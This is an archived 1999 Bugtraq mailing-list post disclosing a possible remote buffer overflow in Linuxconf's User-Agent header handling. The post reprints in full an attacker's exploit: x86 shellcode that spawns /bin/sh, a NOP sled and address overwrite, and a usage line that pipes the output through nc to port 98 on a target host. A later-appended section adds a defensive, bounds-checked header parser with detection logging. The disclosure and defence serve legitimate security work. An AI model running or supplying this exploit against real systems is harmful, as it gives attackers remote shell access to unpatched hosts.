4607233 1999-12-21  19:44  /108 lines/ Postmaster
Recipient: Bugtraq (import) <8966>
Subject: (Possible) Linuxconf Remote Buffer Overflow Vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <19991221103114.C21283@securityfocus.com>
Date:         Tue, 21 Dec 1999 10:31:14 -0800
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
X-To:         bugtraq@securityfocus.com, incidents@securityfocus.com
X-cc:         cert@cert.org, linuxconf@hub.xc.org, jack@solucorp.qc.ca 
             vuldb@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

There may exist a buffer overflow vulnerability in the Linuxconf
package shipped with some versions of Linux systems. The vulnerability
may be in the program's handling of HTTP headers. Initial testing
with Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If others
can test the exploit and report their results it would be appreciated.

This is an example of what good can happen from sharing security
incident information. There have been reports in the INCIDENTS mailing
list for several months now of scans for port 98. Since no
publicly known major vulnerabilities existed in this service the
traffic was somewhat strange. After some digging around
Jon Starnaud <jon.starnaud@rci.com> was able to find this exploit.

If you are not subscribed to INCIDENTS and wish to share incident
information I suggest you sign up. If the vulnerability does exist
this would be the second vulnerability we discover thanks to sharing
incident information (the first one being sadmind).

http://www.securityfocus.com/forums/incidents/faq.html

/*

  linuxconf exploit by R00T-X (c) 1999

  USER_AGENT overflow x86
  should work on all linux's but you need to have
  network access to linuxconf

  greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me,
heh :P

  have fun with this but for EDUCATIONAL PURPOSES :)

  Usage:   (./linexp <offset>;cat)| nc targethost 98

 */

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh\x00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

int
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp;
  char shell[1024+300];

  if(argc < 2)
  {
    fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
    exit(0);
  }

  nop = 511;
  esp = 0xefbfd5e8;
  offset = atoi(argv[1]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));

  for (i = 256; i < BUFLEN - 3; i += 2)
  {
    *((int *) &buf[i]) = esp + (long) offset;
    shell[ sizeof(shell)-1 ] = 0;
  }

  printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);

  printf("\r\n");

  return 0;
}


--
Elias Levy
Security Focus
http://www.securityfocus.com/
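The exploit above sends a 1025-byte, NOP-filled value in place of a User-Agent header, which only pays off if the receiving header parser copies the value into a fixed buffer without checking its length. As an added defender-side example (written for this page; it is not Linuxconf's code, and the 256-byte bound, the function names and the sample inputs are assumptions), here is how a header parser can refuse such a value before writing a single byte: it measures the value against the destination size first and rejects non-printable bytes, so an oversize or binary User-Agent is dropped rather than copied.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

/* Hypothetical upper bound for a stored User-Agent value; assumed for this
 * example, not taken from Linuxconf. */
#define UA_MAX 256

enum ua_verdict { UA_OK = 0, UA_NOT_UA = 1, UA_TOO_LONG = 2, UA_BAD_BYTES = 3 };

/* Parse one "Name: value\r\n" header line.  If it is a User-Agent header,
 * copy the value into out (capacity out_len) only when it fits with room for
 * the terminator and consists solely of printable ASCII.  Anything else is
 * rejected before any byte is written, so the value can never run past the
 * destination buffer. */
int parse_user_agent(const char *line, char *out, size_t out_len)
{
    static const char prefix[] = "User-Agent:";
    size_t plen = sizeof prefix - 1;
    const char *v;
    size_t n, i;

    if (strncasecmp(line, prefix, plen) != 0)
        return UA_NOT_UA;

    v = line + plen;
    while (*v == ' ' || *v == '\t')      /* skip optional leading whitespace */
        v++;

    n = strcspn(v, "\r\n");              /* value ends at end of line */
    if (n >= out_len)                    /* bound check BEFORE any copy */
        return UA_TOO_LONG;

    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)v[i];
        if (c < 0x20 || c > 0x7e)        /* control bytes, NOPs, raw binary */
            return UA_BAD_BYTES;
    }

    memcpy(out, v, n);
    out[n] = '\0';
    return UA_OK;
}

/* Convenience check: does parsing `line` store exactly `expected`? */
int stores_exactly(const char *line, const char *expected)
{
    char out[UA_MAX];
    return parse_user_agent(line, out, sizeof out) == UA_OK &&
           strcmp(out, expected) == 0;
}

/* Build a constructed header line whose value is `len` copies of `fill` and
 * return the parser's verdict.  len=1025 with fill=0x90 has the shape of
 * the request the posted exploit emits. */
int verdict_for_filled_value(size_t len, int fill)
{
    static const char head[] = "User-Agent: ";
    char line[4096];
    char out[UA_MAX];
    size_t hlen = sizeof head - 1;

    if (hlen + len + 3 > sizeof line)
        return -1;                        /* sample too large for this helper */
    memcpy(line, head, hlen);
    memset(line + hlen, fill, len);
    memcpy(line + hlen + len, "\r\n", 3); /* copies the terminating NUL too */
    return parse_user_agent(line, out, sizeof out);
}

int main(void)
{
    char out[UA_MAX];
    int v = parse_user_agent("User-Agent: Mozilla/4.0 (X11; Linux)\r\n",
                             out, sizeof out);
    printf("benign value: verdict %d, stored \"%s\"\n", v, v == UA_OK ? out : "");
    printf("1025 x 0x90 (exploit-shaped): verdict %d\n",
           verdict_for_filled_value(1025, 0x90));
    printf("20 x 0x90 (short but binary): verdict %d\n",
           verdict_for_filled_value(20, 0x90));
    return 0;
}
```

The order of the two checks matters: the length test runs before the byte scan and before `memcpy`, so a 1025-byte value is refused by size alone, and a short value stuffed with 0x90 bytes is refused by content. Logging the verdicts `UA_TOO_LONG` and `UA_BAD_BYTES` with the peer address gives a cheap detection signal for the port 98 probing the post describes.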